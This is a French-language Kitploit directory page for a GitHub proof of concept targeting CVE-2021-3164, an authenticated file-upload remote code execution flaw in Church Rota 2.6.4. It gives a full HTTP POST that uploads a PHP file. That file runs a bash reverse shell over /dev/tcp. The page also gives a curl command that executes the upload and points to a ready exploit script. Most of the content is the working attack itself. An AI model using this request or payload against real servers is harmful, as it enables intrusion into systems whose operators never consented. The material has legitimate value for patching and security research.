Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-3164 — Church Rota version 2.6.4 est vulnérable à une exécution de code à distance authentifiée. L'utilisateur n'a pas besoin d'avoir la permission de téléversement de fichier pour téléverser et exécuter un fichier arbitraire. L'application est écrite principalement avec PHP, donc nous utilisons PHP dans notre PoC. | Kitploit
Outils/GitHubGitHub/rmccarth/cve-2021-3164
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrmccarth/cve-2021-3164

cve-2021-3164

Voir le dépôt
2il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Church Rota version 2.6.4 est vulnérable à une exécution de code à distance authentifiée. L'utilisateur n'a pas besoin d'avoir la permission de téléversement de fichier pour téléverser et exécuter un fichier arbitraire. L'application est écrite principalement avec PHP, donc nous utilisons PHP dans notre PoC.

Partager

Church Rota version 2.6.4 est vulnérable à une exécution de code à distance authentifiée. L'utilisateur n'a pas besoin de disposer de la permission de téléversement de fichier pour téléverser et exécuter un fichier arbitraire.

Après vous être connecté à Church Rota, envoyez la requête suivante, en remplaçant par votre PHPSESSID :

root@kitploit:~
POST /resources.php?action=newsent HTTP/1.1

Host: localhost:8081

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488

Content-Length: 571

Origin: http://localhost:8081

Connection: close

Referer: http://localhost:8081/resources.php?action=new

Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j

Upgrade-Insecure-Requests: 1

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcename"

exec

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcefile"; filename="exec.php"

Content-Type: text/plain

<?php

exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");

?>


-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcedescription"



<p>text file upload</p>

-----------------------------78920178725041013532564196488--

Le fichier peut ensuite être exécuté avec la commande suivante :

root@kitploit:~
curl localhost:80/documents/exec.php

ou en cliquant sur le fichier sous « resources » dans l'interface web.

Ou simplement installez pwntools et requests avec pip, puis configurez et lancez le script d'exploitation fourni cve-2021-3164.py.

Télécharger l’outil